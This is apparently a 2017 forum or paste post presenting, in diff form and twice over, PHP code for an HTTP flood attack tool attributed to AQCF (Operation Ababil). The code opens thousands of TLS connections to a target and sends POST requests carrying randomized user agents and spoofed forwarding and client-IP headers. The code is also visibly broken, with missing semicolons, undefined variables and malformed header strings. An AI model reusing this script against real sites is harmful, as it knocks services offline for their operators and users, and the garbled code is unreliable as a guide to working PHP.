EncodeTheCode · March 3, 2017 02:39
diff --git a/AQCF.php b/AQCF.php
 // 0-day vulnerability from 2010. Original code was written in Python by ETC (EncodeTheCode).
 // AQCF (Operation Ababil) was a later variant for PHP written by some other coder(s) based on my code which takes concept to the web browser rather than via application. It's still somewhat the same in certain ways and I can't help but pointing it out.
 $r=4000 // Requests
 $num=9000 // Requests
 for($i=0;$i<$r;$i++){
 	fwrite($socket,"POST / HTTP/1.0\r\nHost: ".$host."\r\nAccept: "/"\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data);
 	fclose($fp);
 }

 for($i=0;$i<$num;$i++){
 	$fp=fsockopen("tls://".$parts["host"],443);
 	stream_set_timeout($fp,300);
 	fwrite($fp,http_req());
 	stream_set_blocking($fp,0);
 	$target_sockets[]=$fp;
 }

 function http_req(){
 	$rand=md5(microtime().rand(0,500));
 	$host=$parts["host"];
 	$path=$parts["path"];
 	return "POST $path HTTP/1.1\r\n"."Host: $host\r\n"."User-Agent: ".$ua[rand(0,count($ua)-1)]."\r\n"
 	."Accept: text/html,application/xhtml+xml,application/xml;q=0.9;*/*;q=0.8\r\n"."Accept-Language: en-us,en;q=0.5\r\n"
 	."Accept-Encoding: gzip,deflate\r\n"."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 	."Connection-Keep-Alive\r\n"."Cache-Control: no-cache\r\n"."Referer: ".$referer."\r\n"
 	."Cookie: ".getcookie()."\r\n"."X-FORWARDED-FOR: ".ipgen()."\r\n"."Via: ".ipgen()."\r\n"
 	."CLIENT-IP: ".ipgen()."\r\n"."Content-Type: application/x-www-form-urlencoded\r\n"
 	."Content-Length: strlen($postdata)."\r\n\r\n"	
 }
	// 0-day vulnerability from 2010. Original code was written in Python by ETC (EncodeTheCode).
	// AQCF (Operation Ababil) was a later variant for PHP written by some other coder(s) based on my code which takes concept to the web browser rather than via application. It's still somewhat the same in certain ways and I can't help but pointing it out.
	$r=4000 // Requests
	$num=9000 // Requests
	for($i=0;$i<$r;$i++){
	fwrite($socket,"POST / HTTP/1.0\r\nHost: ".$host."\r\nAccept: "/"\r\nContent-Length: ".strlen($data)."\r\n\r\n".$data);
	fclose($fp);
	}

	for($i=0;$i<$num;$i++){
	$fp=fsockopen("tls://".$parts["host"],443);
	stream_set_timeout($fp,300);
	fwrite($fp,http_req());
	stream_set_blocking($fp,0);
	$target_sockets[]=$fp;
	}

	function http_req(){
	$rand=md5(microtime().rand(0,500));
	$host=$parts["host"];
	$path=$parts["path"];
	return "POST $path HTTP/1.1\r\n"."Host: $host\r\n"."User-Agent: ".$ua[rand(0,count($ua)-1)]."\r\n"
	."Accept: text/html,application/xhtml+xml,application/xml;q=0.9;/;q=0.8\r\n"."Accept-Language: en-us,en;q=0.5\r\n"
	."Accept-Encoding: gzip,deflate\r\n"."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
	."Connection-Keep-Alive\r\n"."Cache-Control: no-cache\r\n"."Referer: ".$referer."\r\n"
	."Cookie: ".getcookie()."\r\n"."X-FORWARDED-FOR: ".ipgen()."\r\n"."Via: ".ipgen()."\r\n"
	."CLIENT-IP: ".ipgen()."\r\n"."Content-Type: application/x-www-form-urlencoded\r\n"
	."Content-Length: strlen($postdata)."\r\n\r\n"
	}